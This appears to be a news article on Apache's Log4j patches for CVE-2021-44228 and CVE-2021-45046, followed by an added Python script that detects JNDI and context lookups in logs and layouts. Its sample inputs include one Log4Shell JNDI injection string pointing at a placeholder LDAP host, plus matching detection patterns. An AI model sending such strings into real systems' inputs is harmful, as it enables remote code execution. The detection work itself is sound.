As affected organizations and vendors continue to identify products exposed to the Log4Shell remote code execution (RCE) vulnerability in Log4j, Apache has released additional Log4j security updates to fix another RCE vulnerability (CVE-2021-45046).
Researchers first discovered the critical Apache Log4j vulnerability (CVE-2021-44228), which could allow an attacker who controls log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
As a result, the severe issue soon triggered a mad scramble by organizations to patch the flaw quickly and to put up other blocking mitigations, such as web application firewall (WAF) policies.
In addition, CISA, Microsoft, Palo Alto Networks and many other vendors issued new guidance for Log4j vulnerability remediation.
On December 10, 2021, Apache released Log4j 2.15.0 for Java 8 users to address CVE-2021-44228, which affected all Log4j versions from 2.0-beta9 to 2.14.1.
On December 13, 2021, Apache then released Log4j 2.12.2 for Java 7 users and Log4j 2.16.0 for Java 8 users to address another Log4j RCE vulnerability, CVE-2021-45046.
“It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments; remote code execution has been demonstrated on macOS but no other tested environments,” Apache wrote in the updated security advisory regarding CVE-2021-45046.
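Both advisories above turn on Log4j's `${prefix:value}` lookup syntax: CVE-2021-44228 on a JNDI lookup reaching the logger, CVE-2021-45046 on a Context Lookup such as `$${ctx:loginId}` sitting in a PatternLayout. The following is an added triage script, not code from the article or from Apache, that walks untrusted input and layout strings, extracts every lookup (honouring nesting and the `$$` deferred form), and grades them so defenders can check logs and configurations while patching. The sample lines and the `placeholder.invalid` host are constructed for the example.

```python
"""Triage helper: find Log4j 2 lookup expressions in log input and layout strings."""
import re
from typing import List, Tuple

# Log4j lower-cases the lookup prefix before dispatch, so match case-insensitively.
JNDI_LOOKUP = re.compile(r"^\$\{\s*jndi\s*:", re.IGNORECASE)  # CVE-2021-44228 vector
CTX_LOOKUP = re.compile(r"^\$\{\s*ctx\s*:", re.IGNORECASE)    # CVE-2021-45046 precondition


def find_lookups(text: str) -> List[str]:
    """Return every ${...} expression in text, outermost first, then its nested ones.

    Brace depth is tracked so "${a${b}c}" yields the whole outer lookup and "${b}".
    The "$${...}" form (deferred evaluation, as in the advisory's example) is picked up
    because the scanner simply skips the leading extra "$".
    """
    found: List[str] = []
    i = 0
    while i < len(text) - 1:
        if text.startswith("${", i):
            depth, j = 0, i
            while j < len(text):
                if text.startswith("${", j):
                    depth += 1
                    j += 2
                    continue
                if text[j] == "}":
                    depth -= 1
                    if depth == 0:
                        break
                j += 1
            if j >= len(text):
                found.append(text[i:])  # unterminated lookup: report the tail as-is
                return found
            found.append(text[i:j + 1])
            found.extend(find_lookups(text[i + 2:j]))  # recurse into the body
            i = j + 1
        else:
            i += 1
    return found


def classify(line: str) -> Tuple[str, List[str]]:
    """Grade one line: critical (jndi), warning (ctx in a layout), info (other), clean."""
    lookups = find_lookups(line)
    if any(JNDI_LOOKUP.match(lk) for lk in lookups):
        return "critical", lookups
    if any(CTX_LOOKUP.match(lk) for lk in lookups):
        return "warning", lookups  # only exploitable on 2.15.0 if used in a PatternLayout
    return ("info" if lookups else "clean"), lookups


SAMPLE_LINES = [  # constructed inputs, not real traffic or a real configuration
    "2021-12-13 10:01:02 INFO  login ok user=alice",
    "2021-12-13 10:01:05 WARN  User-Agent: ${jndi:ldap://placeholder.invalid/x}",
    "PatternLayout: %d %p $${ctx:loginId} %m%n",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(classify(line)[0], line)
```

A "warning" hit in a PatternLayout on Log4j 2.15.0 is the configuration the advisory describes; upgrading to 2.16.0 (or 2.12.2 on Java 7) removes the exposure regardless of the layout.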